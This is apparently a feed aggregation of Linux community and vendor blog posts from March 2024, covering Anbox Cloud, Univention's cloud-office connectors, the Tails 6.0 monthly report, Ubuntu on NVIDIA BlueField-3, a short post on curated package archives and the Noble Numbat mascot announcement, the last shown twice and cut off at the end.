<p>Anbox Cloud brings Android from mobile devices to the cloud. This enables service providers to deliver a large and existing ecosystem of games to more users, regardless of their device or operating system. Existing games can be moved to Anbox Cloud with zero to minimal effort.</p>
<p>Canonical has built Anbox Cloud upon existing technologies that allow for a higher container density compared to traditional approaches, which helps to reduce the overall cost of building and operating a game streaming service. The cost structure of a casual game, based in the cloud, also shows that density is key for profitability margins. To achieve density optimisation, three factors must be considered: container density (CPU load, memory capacity and GPU capacity), profitability and user experience optimisation. Additional considerations include choosing the right hardware to match the target workload, intended rendering performance and the pricing sensitivity of gamers. Finding the optimal combination for these factors and adding a layer of automation is crucial to improve profitability margins and to meet SLAs.</p>
<p>To further address specific challenges in cloud gaming, Canonical collaborates with key silicon and cloud partners to build optimised hardware and cloud instance types. Cloud gaming has a high demand on various hardware components, specifically GPUs which provide the underlying foundation for every video streaming solution. Utilising the available hardware with the highest density for cost savings, requires optimisation on every layer. <a href="https://anbox-cloud.io">Anbox Cloud</a> specifically helps to get the maximum out of the available hardware capacity. It keeps track of resources spent by all launched containers and optimises placement of new containers based on available capacity and resource requirements of specific containers.</p>
<p>Next to finding the right software and hardware platform, cloud gaming mandates positioning the actual workload as close to the user as possible to reduce latency and ensure a consistent experience. To scale across different geographical regions, <a href="https://anbox-cloud.io">Anbox Cloud</a> provides operational tooling and software components to simplify the deployment without manual overhead and ensures users get automatically routed to their nearest location. By plugging individual regions dynamically into a control plane allows new regions to be easily added on the go without any downtime or manual intervention.</p>
<p><a href="https://anbox-cloud.io">Anbox Cloud</a> builds a high-density and easy-to-manage containerisation platform on top of the <a href="https://linuxcontainers.org/#LXD">LXD</a> container hypervisor which helps to minimise the time to market and reduce overall costs. It reflects Canonical’s deep expertise in cloud-native applications and minimises operational overhead in multiple ways. With the use of existing technologies from Canonical like <a href="https://jaas.ai/">Juju</a> or <a href="https://maas.io/">MAAS</a>, it provides a solid and proven platform which is easy to deploy and maintain. Combined with the <a href="https://ubuntu.com/pro">Ubuntu Pro</a> support program from Canonical, an enterprise can ensure it gets long-term help whenever needed.</p>
<p>As differentiation is key in building a successful cloud gaming platform, <a href="https://anbox-cloud.io">Anbox Cloud</a> provides a solid foundation which is extensible and fits into many different use cases. For example, integrating a custom streaming protocol is possible by writing a plug-in and integrating it via provided customising hooks into the containers which power <a href="https://anbox-cloud.io">Anbox Cloud</a>. To make this process easy, Canonical provides an SDK, rich documentation with example plugins and engineering services to help with any development around <a href="https://anbox-cloud.io">Anbox Cloud</a>.</p>
<p>In summary, <a href="https://anbox-cloud.io">Anbox Cloud</a> provides a feature rich, generic and solid foundation to build a state of the art cloud gaming service which provides optimal utilisation of the underlying hardware to deliver the best user experience while keeping operational costs low.</p>
<p>If you’re interested to learn more, please come and <a href="https://anbox-cloud.io/contact-us">talk to us</a>.</p>
<p class="has-small-font-size">Android is a trademark of Google LLC. Anbox Cloud uses assets available through the Android Open Source Project.<br /><br /></p>Ubuntu developershttp://planet.ubuntu.com/Univention App Highlights: Enhancing Office Solutions Through Advanced IAM Integrationhttps://www.univention.de/?p=686262024-03-20T07:35:26+00:00<section class="wpb-content-wrapper"><div class="univention-row default univention-row--padding-45 color-scheme-default"><div class="univention-container"><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
<div class="wpb_text_column wpb_content_element ">
<div class="wpb_wrapper">
<p>Welcome back to our journey into the world of Univention apps! In this blog series, we regularly present exciting applications from our <a href="https://www.univention.com/products/app-catalog/">App Center</a>. In our second episoide, we’re diving into IAM integration with two key connectors: the Microsoft 365 Connector and the Google Workspace Connector. These apps build bridges and facilitate exchange between your UCS environment and these essential cloud office solutions.<span id="more-68626"></span></p>
<h2>Office in a Browser: Balancing Necessity with Compromise</h2>
<p>Microsoft 365 and Google Workspace have become the go-to platforms for businesses of all sizes. These cloud-based office solutions are notably practical, offering easy browser access from various devices, an extensive array of collaboration tools, and scalable options—a key benefit for expanding companies. Despite their convenience and ability to cover essential business requirements, these cloud services are not without their flaws, often considered a “necessary evil”.</p>
<p>The platforms bind companies to their respective ecosystems, creating dependencies. This connection to a single provider limits choices and raises significant concerns regarding security and data protection, issues that often trouble decision-makers and users alike. Neither Microsoft 365 nor Google Workspace is immune to security vulnerabilities, and the centralized cloud storage of sensitive corporate data continuously presents a risk.</p>
<p>For those who can’t or prefer not to eliminate cloud services from their operations, finding a way to mitigate security risks without compromising efficiency and functionality is crucial. This is where effective Identity and Access Management (IAM) comes into play. Univention Corporate Server offers a range of robust and powerful IAM functions along with corresponding connectors that make it easy and secure for users to access the cloud office—introducing our two apps: the <a href="https://www.univention.com/products/app-catalog/microsoft365/">Microsoft 365 Connector</a> and the <a href="https://www.univention.com/products/app-catalog/google-apps/">Google Workspace Connector</a>.</p>
<h2>Microsoft 365 Connector</h2>
<p>This app serves as a vital link between your UCS domain and the Microsoft 365 platform. It efficiently synchronizes user accounts and groups from the UCS directory service to Microsoft Entra ID, previously known as Azure Active Directory, Microsoft’s identity and access management service. Our connector ensures a smooth transition for all users, enabling them to log into MS 365 using their UCS credentials through Single Sign-on (SSO). It’s an optimal solution for companies and organizations that leverage Univention Corporate Server for IAM while also wanting to tap into the capabilities of the Microsoft cloud.</p>
<p><strong>Here is an overview of the features:</strong></p>
<ul>
<li><strong>Synchronization:</strong> This feature enables administrators to seamlessly add, update, or remove selected UCS users from the Microsoft 365 Azure account; simplified user management as little to no manual intervention is required; the user base is always up-to-date in both systems</li>
<li><strong>Single Sign-on (SSO):</strong> The SSO capability provides straightforward access to the cloud platform. Users can log in using their UCS credentials, granting direct access to all MS 365 functionalities. Importantly, the user’s password always remains within the UCS domain.</li>
</ul>
<h3>Setting up the Microsoft 365 Connector</h3>
<p>Before you begin installing the app from our App Center, there are a few essential steps to complete. Firstly, you’ll need a Microsoft 365 administrator account and an account with Microsoft Entra (formerly Azure Active Directory). If you don’t already have these, they can be provided by the manufacturer free of charge for testing purposes. In addition, a domain verified by Microsoft is required to ensure your organization operates under a secure and recognized domain. Lastly, you will need a Microsoft 365 business subscription, which is also available as a free trial. Please note that connecting with a private Microsoft account is not an option.</p>
<p>Our manual describes the exact steps for configuration in the <a href="https://docs.software-univention.de/manual/5.0/en/idm-cloud/office-365.html">Microsoft 365 Connector chapter</a>. Once you’re ready, proceed with installing the app. A user-friendly setup wizard is provided to guide you through all the necessary steps to get you up and running.</p>
<p><a href="https://www.univention.de/wp-content/uploads/2024/03/microsoft-365-en.png"><img alt="microsoft 365 connector" class="alignnone wp-image-68628 size-full" height="1006" src="https://www.univention.de/wp-content/uploads/2024/03/microsoft-365-en.png" width="1919" /></a></p>
<p>All other adjustments are made through the Users module of the Univention Management Console (UMC). Within this module, you’ll notice a new tab labeled <em>Microsoft 365</em> for each user profile. It’s important to remember that any modifications made to user data in UCS will automatically be replicated in Microsoft Entra ID. However, the process isn’t bidirectional; changes made directly in MS Entra won’t sync back to UCS. If users or groups are deactivated or renamed there, they aren’t deleted but merely deactivated, enabling the reallocation of their licenses as needed.</p>
<p>Since 2021, the connector has expanded its capabilities to include support for collaboration with MS Teams. This feature allows UCS groups to be established as Teams within Microsoft 365, all managed via the UMC. During the setup process, you’ll assign a team owner who will then handle additional configurations directly in the Teams interface. Once you’ve activated a UCS group as a Team in Microsoft 365, its members are automatically added to the new team.</p>
<h2>Google Workspace Connector</h2>
<p>This app acts as a gateway to Google’s cloud services, ensuring user identities stay safely within your own IT infrastructure. This allows for complete control over user data. The connector is compatible with both the business edition of Google Workspace, ideal for companies with up to 300 users, and the education version, designed for educational institutions. Thanks to the single sign-on feature, user passwords are securely contained within the UCS domain, maintaining the security of sensitive access information in your environment.</p>
<p><strong>Key Features Include:</strong></p>
<ul>
<li><strong>Single Sign-on (SSO):</strong> Enables users to log in using their UCS credentials, providing direct access to all Google Workspace functionalities. The user password always stays secure within the UCS domain; users do not need to create and manage their own Google account.</li>
<li><strong>Central License Management:</strong> This feature allows administrators to effortlessly monitor and manage licenses and associated costs.</li>
</ul>
<h3>Setting up the Google Workspace Connector</h3>
<p>To set up the Google Workspace Connector for your UCS environment, begin by ensuring you have a Google administrator account. This account is needed to log in to the Google Admin Console, where you can manage Google services for all users in your organization. Note that a private Google account will not suffice for this purpose. Additionally, you’ll need a domain verified by Google. Fortunately, both can be obtained from the provider at no cost for testing purposes.</p>
<p>After installing the Google Workspace Connector app, a setup wizard will launch, guiding you through the initial configuration steps.</p>
<p><a href="https://www.univention.de/wp-content/uploads/2024/03/google-workspace-en.png"><img alt="google workspace connector" class="alignnone wp-image-68629 size-full" height="750" src="https://www.univention.de/wp-content/uploads/2024/03/google-workspace-en.png" width="1011" /></a></p>
<p>The remaining configuration steps for the Google Workspace Connector are conducted via the Users module in the Univention Management Console (UMC). For all user objects, there is now a new tab called <em>Google Apps</em> which allows you to designate whether an account should be provisioned to Google Workspace. Any changes made in the UCS directory service are automatically synchronized with the Google service. Similar to the Microsoft 365 Connector, this synchronization is unidirectional, meaning that modifications made in the Google domain are not automatically transferred to the UCS system. If you deactivate an account’s Google Apps feature in UCS, it will automatically be removed from the Google domain. This mechanism ensures that user information remains consistent and up-to-date across both systems.</p>
<p>For more information about the setup, please read the <a href="https://docs.software-univention.de/manual/5.0/de/idm-cloud/google.html#google-apps-for-work-connector">Google Apps for Work Connector chapter</a> in our manual.</p>
<h2>Final Thoughts: Join the Conversation in Our Community</h2>
<p>Wrapping up, we’re left with an important question: Is identity and access management like this really the best way to go? Does the ease it brings make up for being tied to certain platforms and the security worries that might come with it? For companies and organizations that can’t let go of Microsoft or Google cloud services, our connector apps are a solid and secure choice for both users and admins. And if you’re thinking of moving away from the big cloud providers, our App Center is full of collaboration and office tools under open source licenses that fit right into the UCS environment.</p>
<p>What’s been your journey with Univention Corporate Server as an IAM solution? Have you tried out any of the connectors we talked about in this article? We’d love to hear about your experiences. Share your stories with us and the community.</p>
<p>Visit the <a href="https://help.univention.com/">Forum Univention Help</a> and become a part of our community!</p>
<p> </p>
<p style="text-align: right;">Image source: Icon created by <a href="https://www.flaticon.com/authors/freepik">Freepic</a> from flaticon.com</p>
</div>
</div>
</div></div></div></div></div></div>
</section><p>Der Beitrag <a href="https://www.univention.com/blog-en/2024/03/univention-app-highlights-enhancing-office-solutions-through-advanced-iam-integration/">Univention App Highlights: Enhancing Office Solutions Through Advanced IAM Integration</a> erschien zuerst auf <a href="https://www.univention.com">Univention</a>.</p>Yvonne Rugehttps://www.univention.com/news/blog-en/BunsenLabs Mastodonhttps://www.bunsenlabs.org/feed/news/b8b2286d-8be2-5f12-8920-dbe8d8455f852024-03-20T00:00:00+00:00<div class="postmsg">
<p>
We officially took control of the BL Mastodon instance today. Please feel free to give us a follow and a boost.
</p>
<p>
@bunsenlabs@linuxrocks.online
</p>
</div>BunsenLabs Linuxhttps://forums.bunsenlabs.org/viewforum.php?id=12Tails report for February 2024https://tails.net/news/report_2024_02/2024-03-19T11:46:47+00:00<h1>Highlights</h1>
<p>Despite the bonus day this year, February flew by pretty quickly! Here's what
we were up to:</p>
<ul>
<li><p>We ended February more resilient and collaborative than when we started. We
have new tooling to make it easier to work on shared documents, and use XMPP
more effectively. We also worked to strengthen our front-end services and set
up the back-end infrastructre to build redundancies into our services.</p></li>
<li><p>In 2021 and 2022, our <a href="https://tails.net/news/improving_in_latam/index.en.html">usability tests with human rights defenders in Mexico
and Brazil</a> prompted several
improvements in the installation instructions for Tails. Fixing 16 of the
identified usability issues were remaining, and we fixed them all this month.
These tests, experiences, and improvements will greatly shape our future
trainings.</p></li>
<li><p>We finished updating our website for Tails 6.0. Check out the rewritten
<a href="https://tails.net/doc/encryption_and_privacy/secure_deletion/index.en.html">recommendation on secure
deletion</a>. </p></li>
</ul>
<h1>Releases</h1>
<p>📢 <a href="https://tails.net/news/version_6.0/index.en.html">Tails 6.0 is out</a>! </p>
<p>Tails 6.0 is the first version of Tails based on Debian 12 ("bookworm"), and is
the sexiest, slickest, and sleekest Tails yet. It brings:</p>
<ul>
<li><p>several important security updates: more robust error detection for the
Persistent Storage, protections against malicious USB devices, and Diceware
word lists in Catalan, German, Italian, Portuguese, and Spanish</p></li>
<li><p>some more usability features: new light modes—dark, night, and a
combination of both; easier screenshoting and screencasting; and easier Gmail
configuration in Thunderbird</p></li>
<li><p>and, updated version of most of the applications in Tails</p></li>
</ul>
<p>To know more, check out the Tails 6.0 <a href="https://tails.net/news/version_6.0/index.en.html">release notes</a> and
the
<a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.
Thank you to everyone who helped us out by testing the <a href="https://tails.net/news/test_6.0-rc1/">release
candidate</a>.</p>
<h1>Metrics</h1>
<p>Tails was started more than 806,714 times this month. That's a daily average of
over 27,817 boots.</p>Tailshttps://tails.net/news/index.en.htmlUbuntu Blog: Canonical collaborates with NVIDIA to simplify enterprise AI deployments with NVIDIA BlueField-3 operating an optimised, Ubuntu-based Linux OShttps://ubuntu.com//blog/ubuntu-and-nvidia-bluefield-32024-03-19T09:00:00+00:00<p>The <a href="https://www.nvidia.com/en-us/networking/products/data-processing-unit/">NVIDIA BlueField-3 networking platform</a> – powering the latest data processing units (DPUs) and SuperNICs, and transforming data centre performance and efficiency – runs BlueField OS, an optimised Linux operating system (OS) derived from Ubuntu. With Ubuntu’s signature maintenance and support guarantees, the comprehensive Ubuntu Pro software infrastructure stack, and bespoke optimisation, the collaboration between NVIDIA and Canonical accelerates time to value for NVIDIA BlueField-3 users and elevates security. </p>
<h2 class="wp-block-heading">What are DPUs? </h2>
<p>DPUs are a relatively new technology that represents the third pillar of accelerated data centre processing units, alongside CPUs and GPUs. By offloading and accelerating a wide variety of complex networking, security and storage workloads to the DPU, enterprises can <a href="https://resources.nvidia.com/en-us-accelerated-networking-resource-library/nvidia-dpu-power-efficiency-white-paper">reduce server power consumption by up to 30%</a> while freeing up CPU capacity for computation tasks.</p>
<figure class="wp-block-image">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh7-us.googleusercontent.com/ET41fpdF7Vt1LyDLjxM90Y2Ca-lxWlIYojlah_H39HyPSnHdsLJ7ssYkkJ49OSge0KLnQDOImBczLPhgMwv8fwX8b5TrD6FOwezXgyCMdFtDq4ZIxGrPy0vSTp3ZKoIXsLYfv_cyMedRx6j2fCJs" width="720" />
</noscript>
</div>
</figure>
<p>NVIDIA, now shipping the third generation of its industry-leading BlueField DPU, empowers enterprises to transform data centres with a 400Gb/s infrastructure compute platform that can handle the most demanding AI workloads. </p>
<h2 class="wp-block-heading">NVIDIA BlueField OS is built on Ubuntu</h2>
<p>DPUs require an operating system that is secure, stable and capable of supporting all of the innovative features that the new technology brings to the table – and that’s why NVIDIA BlueField-3 runs an optimised derivative of Ubuntu as its default OS. </p>
<p>Ubuntu, delivered by Canonical, supports a broad range of NVIDIA BlueField-3 features, ensuring that enterprise customers can readily consume the DPU functions with optimal performance. Canonical’s collaboration with NVIDIA delivers a solution that is easy to implement and offers full functionality out of the box.</p>
<p>Alongside time to value, Ubuntu reinforces the stability of NVIDIA BlueField-3. The optimised Ubuntu derivative powering the NVIDIA BlueField OS is based on Ubuntu Long Term Support (LTS) and goes through the same rigour of validation as an LTS release, which consequently delivers the same level of stability and performance. Ubuntu Pro embedded support is a core part of NVIDIA BlueField’s OS, thus enhancing the reliability of any NVIDIA BlueField-accelerated solution. </p>
<h2 class="wp-block-heading">NVIDIA BlueField-3 Enterprise support and security backed by Canonical</h2>
<p>Ubuntu’s <a href="https://ubuntu.com/security">extensive security features</a>, hardening and compliance tooling, coupled with Canonical’s enterprise-grade support, have been instrumental in making Ubuntu the first-choice OS for organisations worldwide. NVIDIA customers can be assured that these same capabilities are also extended to NVIDIA BlueField-3 deployments.</p>
<p>One of the key factors that sets Ubuntu’s security apart from alternative operating systems is the pace at which Canonical delivers fixes for security common vulnerabilities and exposures (CVEs). Canonical has the fastest turnaround for CVE fixes in the industry, and this rapid patching applies to the NVIDIA BlueField OS. What’s more, these updates can be applied automatically, further minimising any windows of vulnerability. </p>
<p>Canonical is also signing the entire kernel image for the NVIDIA BlueField OS. This enables secure boot in enterprise deployments and guarantees that no modifications are made to the kernel, so that users can have complete trust in the OS.</p>
<h2 class="wp-block-heading">Powering AI with Canonical infrastructure solutions and NVIDIA BlueField-3 </h2>
<p>NVIDIA BlueField-3 DPUs are increasingly becoming a central component in enterprise AI strategies. These use cases require a comprehensive ecosystem of software for optimal performance and efficiency. Canonical’s close collaboration with NVIDIA enables BlueField-3 users to take advantage of infrastructure solutions to address most enterprise AI data centre deployments and enable end-to-end management.</p>
<p>Customers can utilise metal-as-a-service (<a href="https://maas.io/">MAAS)</a> for cloud-style provisioning of their physical infrastructure, turning bare-metal servers into an elastic, cloud-like resource that they can easily provision, monitor and manage. Meanwhile, <a href="https://juju.is/">Juju</a> provides an orchestration engine for software operators that enables the deployment, integration, and lifecycle management of applications at any scale on infrastructure compute.</p>
<p>On the infrastructure software side, <a href="https://ubuntu.com/openstack">Canonical OpenStack</a> provides an enterprise cloud platform, and <a href="https://ubuntu.com/kubernetes">Canonical Kubernetes</a> drives seamless, highly automated container orchestration. These infrastructure services can fully utilise the offload capabilities supported in NVIDIA BlueField DPUs. In fact, Canonical also offers <a href="https://microk8s.io/">MicroK8s</a>, a lightweight Kubernetes distribution that is tailor-made for low footprint deployments on DPUs. Similarly, <a href="https://microcloud.is/">MicroCloud </a>is a miniature version of LXD, providing enterprises with everything they need to run virtualized workloads and system containers on their DPUs. All of these solutions are secured and supported for 10 years with an Ubuntu Pro subscription.</p>
<h2 class="wp-block-heading">Ubuntu Pro and NVIDIA DOCA</h2>
<p>The Ubuntu Pro stack works in tandem with <a href="https://developer.nvidia.com/networking/doca">NVIDIA DOCA</a>, software at the heart of NVIDIA BlueField-3. NVIDIA DOCA is a unified software framework that provides a variety of APIs for improved NVIDIA BlueField-3 management, unlocking features around connectivity, monitoring, logging and more. Utilised alongside Ubuntu Pro, these features drive unprecedented infrastructure efficiency.</p>
<ul>
<li>To learn more about deploying DPUs on Ubuntu, <a href="https://ubuntu.com/nvidia">get in touch</a>.</li>
<li>To learn more about NVIDIA BlueField-3, check out the <a href="https://resources.nvidia.com/en-us-accelerated-networking-resource-library/datasheet-nvidia-bluefield">datasheet</a>.</li>
<li>Further reading: <a href="https://ubuntu.com/blog/ubuntu-on-smartnics-drive-data-centre-efficiency">Canonical solutions reduce SmartNIC time-to-market and drive efficiency in enterprise data centers</a></li>
</ul>Ubuntu developershttp://planet.ubuntu.com/(中文) 议题揭晓 | 3月23日武汉 Linux 用户组线下沙龙邀您参与!https://www.deepin.org/?p=333862024-03-19T08:53:11+00:00Sorry, this entry is only available in 中文.aidahttps://www.deepin.org/enColin Watson: apt install everything?tag:www.chiark.greenend.org.uk,2024-03-19:/~cjwatson/blog/ubuntu-install-everything.html2024-03-19T07:05:27+00:00<p>On Mastodon, the
<a href="https://mastodon.social/@Hacksaw/112118031428498349">question</a> came up of
how Ubuntu would deal with something like the <a href="https://boehs.org/node/npm-everything">npm install
everything</a> situation. I replied:</p>
<blockquote>
<p>Ubuntu is curated, so it probably wouldn’t get this far. If it did, then
the worst case is that it would get in the way of <span class="caps">CI</span> allowing other
packages to be removed (again from a curated system, so people are used to
removal not being self-service); but the release team would have no
hesitation in removing a package like this to fix that, and it certainly
wouldn’t cause this amount of angst.</p>
<p>If you did this in a <a href="https://help.launchpad.net/Packaging/PPA"><span class="caps">PPA</span></a>, then
I can’t think of any particular negative effects.</p>
</blockquote>
<p><span class="caps">OK</span>, if you added lots of build-dependencies (as well as run-time
dependencies) then you might be able to take out a builder. But Launchpad
builders already run arbitrary user-submitted code by design and are
therefore very carefully sandboxed and treated as ephemeral, so this is
hardly novel.</p>
<p>There’s a lot to be said for the arrangement of having a curated system for
the stuff people actually care about plus an ecosystem of add-on
repositories. PPAs cover a wide range of levels of developer activity, from
throwaway experiments to quasi-official distribution methods; there are
certainly problems that arise from it being difficult to tell the difference
between those extremes and from there being no systematic confinement, but
for this particular kind of problem they’re very nearly ideal. (Canonical
has tried various other approaches to software distribution, and while they
address some of the problems, they <a href="https://popey.com/blog/2024/03/exodus-wallet-part-three/">aren’t obviously
better</a> at helping
people make reliable social judgements about code they don’t know.)</p>
<p>For a hypothetical package with a huge number of dependencies, to even try
to upload it directly to Ubuntu you’d need to be an Ubuntu developer with
upload rights (or to go via Debian, where you’d have to clear a similar
hurdle). If you have those, then the first upload has to pass manual review
by an archive administrator. If your package passes that, then it still has
to build and get through
<a href="https://wiki.ubuntu.com/ProposedMigration">proposed-migration</a> <span class="caps">CI</span> before it
reaches anything that humans typically care about.</p>
<p>On the other hand, if you were inclined to try this sort of experiment,
you’d almost certainly try it in a <span class="caps">PPA</span>, and that would trouble nobody but yourself.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: The Coronation of a New Mascot: Noble Numbathttps://ubuntu.com//blog/the-coronation-of-a-new-mascot-noble-numbat2024-03-19T06:00:00+00:00<figure class="wp-block-image size-large is-resized">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/c5414d0e-Numbat.png" width="720" />
</noscript>
</div>
</figure>
<p>Whether it’s via a popular vote, divine providence or magical women lying in ponds distributing swords, it has often been individuals of great renown or noble birth who have ascended to the throne. On the eve of our 20th anniversary, we are thrilled to present the Noble Numbat, our mascot for Ubuntu 24.04 LTS. </p>
<h2 class="wp-block-heading">Humble beginnings </h2>
<p>The numbat, a small enigmatic marsupial from Australia may not be the first creature that comes to mind when one ponders nobility. However, looks can be deceiving. These incredible and endangered species are actually pocket size anteaters which live purely on ants that they catch with a tongue a third the length of their body. With a back of black and white stripes much like a kingly robe, they were elected as the state animal emblem of Western Australia. The numbat is a testament that those from humble beginnings can make their mark on the world.</p>
<h2 class="wp-block-heading">A crowning achievement</h2>
<p>Ubuntu, in the same regard, has grown from a fledgling dream of a more human-friendly Linux into a trusted platform that powers millions of devices around the world. For this LTS (long term support) release we wanted to capture that essence of grandeur and the stateliness of our small Myrmecobiidae friend. </p>
<p>We are very excited to unveil and crown the official mascot wallpaper. Give your computer or phone a majestic upgrade by downloading <a href="https://drive.google.com/drive/folders/1hzlUuCOCORWyTvIWqDN_d9W4gFDqetvZ" rel="noreferrer noopener" target="_blank">these Noble Numbat Wallpapers</a> in a variety of formats and sizes. </p>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/c919/noble1.png" width="1600" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/9a13/noble-dark.png" width="1600" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/f8ee84cd-noble-numbat-wallpaper-light.png" width="720" />
</noscript>
</div>
</figure>
<figure class="wp-block-image size-full">
<div class="lazyload">
<noscript>
<img alt="" height="900" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_1600,h_900/https://ubuntu.com/wp-content/uploads/9bd7/noble-medium.png" width="1600" />
</noscript>
</div>
</figure>
<h2 class="wp-block-heading">Art of the round table</h2>
<p>This majestic wallpaper will be joined by a collection of others from the current incarnation of the <a href="https://discourse.ubuntu.com/t/noble-numbat-24-04-wallpaper-competition/42300">Ubuntu Wallpaper Competition</a>. This year’s competition has attracted other Numbat contestants, exciting scenery from the land of the Numbat, and abstract art in honor of their majesty. We cordially invite you to behold the distinguished recipients of this year’s accolades:</p>
<h3 class="wp-block-heading">Mascot</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/091702e2-community_wallpaper_noble_fuwafuwa_nanbatto_san_by_amaral.jpeg" width="720" />
</noscript>
</div>
Fuwafuwa Nanbatto-san by <a href="https://discourse.ubuntu.com/u/amaral">@amaral</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/0ecd2ffd-community_wallpaper_noble_little_numbat_boy_by_azskalt.jpeg" width="720" />
</noscript>
</div>
Little numbat boy by <a href="https://discourse.ubuntu.com/u/azskalt" rel="noreferrer noopener" target="_blank">@azskalt</a></figure>
<h3 class="wp-block-heading">Digital art</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/63c50fde-community_wallpaper_noble_province_of_the_south_of_france_by_orbitelambda.jpeg" width="720" />
</noscript>
</div>
Province of the South of France by <a href="https://discourse.ubuntu.com/u/orbitelambda">@orbitelambda</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/802d8cc9-community_wallpaper_noble_monument_valley_by_orbitelambda.jpg" width="720" />
</noscript>
</div>
Monument Valley (Arizona) by <a href="https://discourse.ubuntu.com/u/orbitelambda">@orbitelambda</a></figure>
<h3 class="wp-block-heading">Nature</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/070a4d72-community_wallpaper_noble_mount_fuji_by_amaral.jpg" width="720" />
</noscript>
</div>
Mount Fuji, Japan by <a href="https://discourse.ubuntu.com/u/amaral">@amaral</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/cee4ad9f-community_wallpaper_noble_northan_lights_by_mizuno-as.jpg" width="720" />
</noscript>
</div>
Northan Lights by <a href="https://discourse.ubuntu.com/u/mizuno-as">@mizuno-as</a></figure>
<h3 class="wp-block-heading">Others</h3>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/260fd557-community_wallpaper_noble_lightbulb_rainbow_by_audioaddict.jpg" width="720" />
</noscript>
</div>
Lightbulb Rainbow by <a href="https://discourse.ubuntu.com/u/audioaddict">@audioaddict</a></figure>
<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/8a7454ac-community_wallpaper_noble_clouds_by_moka-hun.jpeg" width="720" />
</noscript>
</div>
Clouds by <a href="https://discourse.ubuntu.com/u/moka-hun">@moka-hun</a></figure>
<h2 class="wp-block-heading">Get involved</h2>
<p>In the grand tapestry of our Ubuntu realm, the Ubuntu Wallpaper Competition stands as one avenue for you, esteemed allies and artisans, to contribute to our vibrant community. I invite you to explore the many ways to join our collective endeavor. Venture to <a href="https://ubuntu.com/community/contribute">https://ubuntu.com/community/contribute</a> and enrich Ubuntu with your creativity and collaboration.</p>Ubuntu developershttp://planet.ubuntu.com/Ubuntu Blog: The Coronation of a New Mascothttps://ubuntu.com//blog/the-coronation-of-a-new-mascot2024-03-19T06:00:00+00:00<figure class="wp-block-image size-large">
<div class="lazyload">
<noscript>
<img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://assets.ubuntu.com/v1/31ae60ab-noble-numbat-mascot-animated.gif" width="720" />
</noscript>
</div>
</figure>
<p>Whether it’s via a popular vote, divine providence or magical women lying in ponds distributing swords, it has often been individuals of great renown or noble birth who have ascended to the throne. On the eve of our 20th anniversary this year, we are thrilled to present Noble Numbat, the mascot for Ubuntu 24.04 LTS. </p>
<h2 class="wp-block-heading">Humble beginnings </h2>
<p>The numbat, a small enigmatic marsupial from Australia may not be the first creature that comes to mind when one ponders nobility. However, looks can be deceiving. These incredible and endangered species are actually pocket size anteaters which live purely on ants that they catch with a tongue a third the length of their body. With a back of black and white stripes much like a kingly robe, they were elected as the state animal emblem of Western Australia. The numbat is a testament that those from humble beginnings can make their mark on the world.</p>
<h2 class="wp-block-heading">A crowning achievement</h2>
<p>Ubuntu, in the same regard, has grown from a fledgling dream of a more human-friendly Linux into a trusted platform that powers millions of devices around the world. For this LTS (long term support) release we wanted to capture that essence of grandeur and the stateliness of our small Myrmecobiidae friend. </p>
<p>We are very excited to unveil and crown the official mascot wallpaper. Give your computer or phone a majestic upgrade by downloading <a href="https://drive.google.com/drive/folders/1hzlUuCOCORWyTvIWqDN_d9W4gFDqetvZ" rel="noreferrer noopener" target="_blank">these Noble Numbat Wallpapers</a> in a variety of formats and sizes. </p>
<figure class="wp-block-image size-full">
<div class="lazyload">
